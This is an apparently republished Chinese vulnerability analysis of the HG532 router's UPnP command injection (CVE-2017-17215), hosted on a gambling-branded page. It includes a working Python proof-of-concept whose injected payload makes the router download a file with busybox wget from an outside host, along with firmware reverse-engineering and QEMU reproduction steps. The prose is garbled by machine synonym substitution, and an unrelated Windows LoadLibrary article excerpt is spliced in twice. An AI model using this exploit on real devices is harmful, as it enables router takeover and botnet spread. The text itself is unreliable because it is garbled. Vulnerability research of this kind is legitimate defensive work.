CVE-2017-17215-HG532敕令注入破绽剖析 | 申博官网
登录
  • 欢迎进入申博官网!
  • 如果您觉得申博官网对你有帮助,那么赶紧使用Ctrl+D 收藏申博官网并分享出去吧
  • 这里是申博官方网!
  • 申博官网是菲律宾sunbet官网品牌平台!
  • 申博开户专业品牌平台!

CVE-2017-17215-HG532敕令注入破绽剖析

申博_安全预警 申博 203次浏览 未收录 0个评论

申博网络安全巴士站

申博-网络安全巴士站是一个专注于网络安全、系统安全、互联网安全、信息安全,全新视界的互联网安全新媒体。

————————————-

破绽形貌

华为 HG532 系列路由器是一款为家庭和小型办公用户打造的高速无线路由器产物。

该破绽被用来作为病毒 Mirai 的升级版变种 OKIRU/SATORI,payload由蜜罐所捕捉而被发明的,初次表露是由checkpoint所表露,破绽应用的是upnp效劳存在的注入破绽完成恣意敕令实行。

破绽poc

破绽poc以下:

import requests

headers = {
    "Authorization": "Digest username=dslf-config, realm=HuaweiHomeGateway, nonce=88645cefb1f9ede0e336e3569d75ee30, uri=/ctrlt/DeviceUpgrade_1, response=3612f843a42db38f48f59d2a3597e19c, algorithm=MD5, qop=auth, nc=00000001, cnonce=248d1a2560100669"
}

data = '''<?xml version="1.0" ?>
 <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
  <s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1">
   <NewStatusURL>;/bin/busybox wget -g 172.16.16.17 -l /tmp/1 -r /1;</NewStatusURL>
   <NewDownloadURL>HUAWEIUPNP</NewDownloadURL>
  </u:Upgrade>
 </s:Body>
</s:Envelope>
'''
requests.post('http://172.16.16.21:37215/ctrlt/DeviceUpgrade_1',headers=headers,data=data)

破绽剖析

下载固件,公然存在下载地点

运用binwalk解压该固件。
CVE-2017-17215-HG532敕令注入破绽剖析

检察文件范例,能够看到文件范例是mips 32位的,且花样为大端MSB。
CVE-2017-17215-HG532敕令注入破绽剖析

依据公然的信息可知,破绽处于upnp效劳中,可直接将bin/upnp拖到IDA内里剖析,也能够依据poc中的特性字符串ctrltDeviceUpgrade_1寻觅,看该字符串处于哪一个可实行顺序傍边。
CVE-2017-17215-HG532敕令注入破绽剖析

深入分析 Windows API – LoadLibrary 的内部完成 Part 1

前言 在这里,我们再次来到内核,今天我们将讨论Windows API中最重要的功能之一。做这项研究的动机来自几周前我正在研究的一个项目,当时我正在编写一个DLL的ReflectiverLoader,但我无法使其工作(最后它与一些reloc的东西有关),因此

定位破绽到upnp文件中,将该文件拖到IDA内里举行剖析。

依据poc,注入点是<NewStatusURL><NewDownloadURL>,在字符串中找到它们:
CVE-2017-17215-HG532敕令注入破绽剖析
并检察其交织援用:
CVE-2017-17215-HG532敕令注入破绽剖析
看到挪用函数是在函数sub_40749c傍边,跟过去该函数,能够看到,顺序经由过程ATP_XML_GetChildNodeByName函数猎取xml中的<NewStatusURL>节点,而且未经由搜检就直接与upg -g -U %s -t '1 Firmware Upgrade Image' -c upnp -r %s -d -拼接运用system函数举行实行。
CVE-2017-17215-HG532敕令注入破绽剖析

看到这里就能够看清楚破绽的原理了,具体来说是首先在<NewStatusURL>输入单引号将前面的字符串闭合,然后再注入响应的实行敕令便可,如须要实行ls敕令,则须要做的就是组织<NewStatusURL>';ls;</NewStatusURL>节点便可。该节点字符串与upg -g -U %s -t '1 Firmware Upgrade Image' -c upnp -r %s -d -拼接获得upg -g -U %s -t '1 Firmware Upgrade Image' -c upnp -r ';ls; -d -,然后实行system挪用,完成注入。

破绽复现

依据文章装置qemu体系级的模仿情况,并运用敕令sudo qemu-system-mips -M malta -kernel vmlinux-2.6.32-5-4kc-malta -hda debian_squeeze_mips_standard.qcow2 -append "root=/dev/sda1 console=tty0" -net nic -net tap -nographic开启qemu虚拟机。

然后运用ssh将固件拷贝至该qemu虚拟机中,运用chroot . sh切换到该固件的根目录下,获得下面的图示:
CVE-2017-17215-HG532敕令注入破绽剖析

找下端口37215 ,端口号只出现在mic文件内,以是预测是mic启动的upnp效劳,直接运转mic敕令。
CVE-2017-17215-HG532敕令注入破绽剖析

netstat -l 检察哪些端口处于监听形式,能够看到端口37215已处于监听形式。
CVE-2017-17215-HG532敕令注入破绽剖析

将poc中ip设置准确,运转exp,并开启效劳器端口监听,能够看到运转效果以下:
CVE-2017-17215-HG532敕令注入破绽剖析
运转exp,被攻击者来猎取文件1:
CVE-2017-17215-HG532敕令注入破绽剖析
在被攻击中检察文件1,胜利:
CVE-2017-17215-HG532敕令注入破绽剖析

相干代码和文件在github

深入分析 Windows API – LoadLibrary 的内部完成 Part 1

前言 在这里,我们再次来到内核,今天我们将讨论Windows API中最重要的功能之一。做这项研究的动机来自几周前我正在研究的一个项目,当时我正在编写一个DLL的ReflectiverLoader,但我无法使其工作(最后它与一些reloc的东西有关),因此


申博|网络安全巴士站声明:该文看法仅代表作者自己,与本平台无关。版权所有丨如未注明 , 均为原创丨本网站采用BY-NC-SA协议进行授权
转载请注明CVE-2017-17215-HG532敕令注入破绽剖析
喜欢 (0)
[]
分享 (0)
发表我的评论
取消评论
表情 贴图 加粗 删除线 居中 斜体 签到

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址